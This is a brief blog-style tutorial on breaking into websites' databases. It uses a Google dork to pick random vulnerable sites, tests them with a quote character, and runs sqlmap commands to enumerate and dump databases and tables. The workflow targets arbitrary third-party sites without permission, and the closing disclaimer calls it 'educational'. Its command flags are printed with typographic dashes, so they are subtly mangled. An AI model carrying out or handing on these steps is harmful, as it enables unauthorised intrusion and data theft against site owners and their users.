Today I wil teach you how to hack into a websites database using sqlmap and dump the data.
So what is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Now to hack a website using this tool you need to find a vulnerability in the site. let try to hack a random site by using a google dork.
type this in google:
inurl:index.php?id=
now choose a radnom website and test it by adding ‘, for example inurl:index.php?id=5'
if you get and error in the page then there is an sql injection and now you have to download sqlmap from: sqlmap.org
if you’re using kali linux open a terminal and type:
sqlmap -u “https://www.example.com/index.php?id=5” –dbs –dbms=MySql
now when its done it will give you a list of databases to use it type:
sqlmap -u “https://www.example.com/index.php?id=5” –dbs –dbms=MySql -D name of database –tables
thats it, happy hacking for more commands on how to use sqlmap type:
sqlmap –help
** Disclaimer **
Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator is responsible for the comments posted on this website.